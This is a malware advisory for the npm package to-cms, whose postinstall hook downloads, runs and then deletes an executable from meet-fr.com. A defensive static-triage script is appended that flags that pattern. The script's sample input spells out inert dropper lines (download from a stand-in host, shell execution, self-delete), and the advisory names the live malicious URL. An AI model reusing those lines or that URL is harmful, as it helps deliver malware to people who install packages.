OSV ID: MAL-2026-4693
Ecosystem: npm
Summary
package.json declares postinstall: node index.js. On npm install, index.js unconditionally HTTPS-GETs https://meet-fr.com/ChromeSetup.exe, writes it to os.tmpdir(), executes it via a shell start / open call, and deletes the file ~5 seconds later to hide forensic traces. The domain meet-fr.com is not a Google or Chrome publisher domain; the package name to-cms has no relation to a Chrome installer; the binary is unsigned and unpinned, is fetched with no hash or signature verification, and self-deletes after launch — the canonical dropper shape. A debug.log shipped in the tarball references C:\Users\work1\AppData\Local\Temp\ChromeSetup.exe, corroborating that this code path has executed on the author/build machine. Every installer of this package runs the attacker-controlled binary at install time.
Source: amazon-inspector (cccb3d12c0df356fc34c0b79a003f32a6484dd9229b43dfef5b89c8dd4dec51c)
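
Added example (not part of the OSV record or of Amazon Inspector's tooling): a static triage check for the install-time dropper shape described in the summary, run against an unpacked package before any npm install. The trait patterns, the function name auditPackage and the sample inputs are assumptions constructed for this illustration.

```javascript
// Static triage of an unpacked npm package: which lifecycle hooks run at
// install time, and does the script they launch download and execute a file?
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall'];

// Heuristic source patterns (assumptions chosen for this example).
const TRAITS = {
  download: /\bhttps?\.(get|request)\s*\(|\bfetch\s*\(/,
  tempWrite: /\bos\.tmpdir\s*\(/,
  execute: /\b(exec|execSync|spawn|spawnSync|execFile)\s*\(/,
  selfDelete: /\b(unlink|unlinkSync|rm|rmSync)\s*\(/,
};

// pkg: parsed package.json; files: { relativePath: sourceText }
function auditPackage(pkg, files) {
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = (pkg.scripts || {})[hook];
    if (!cmd) continue;
    // Resolve "node <file>" to the script that runs at install time.
    const m = /^\s*node\s+(\S+)/.exec(cmd);
    const target = m ? m[1].replace(/^\.\//, '') : null;
    const src = target && files[target];
    const traits = src
      ? Object.keys(TRAITS).filter((t) => TRAITS[t].test(src))
      : [];
    // Download plus execution in an install hook is the dropper shape.
    const dropper = traits.includes('download') && traits.includes('execute');
    findings.push({ hook, cmd, target, traits, dropper });
  }
  return findings;
}

// Constructed sample input: inert, abbreviated text that is only pattern-matched.
const samplePkg = { name: 'example-pkg', scripts: { postinstall: 'node index.js' } };
const sampleFiles = {
  'index.js': [
    "const out = path.join(os.tmpdir(), 'setup.exe');",
    "https.get('https://downloads.example.invalid/setup.exe', save);",
    "exec('start ' + out);",
    'setTimeout(() => fs.unlink(out, () => {}), 5000);',
  ].join('\n'),
};
// Constructed negative case: no install-time hook at all.
const benignPkg = { name: 'example-lib', scripts: { test: 'node test.js' } };

console.log(JSON.stringify(auditPackage(samplePkg, sampleFiles), null, 2));
```

A hit is a prompt for manual review, not a verdict: obfuscated or multi-stage scripts will evade simple patterns, so pairing this with npm's --ignore-scripts option during evaluation keeps the hook from running at all.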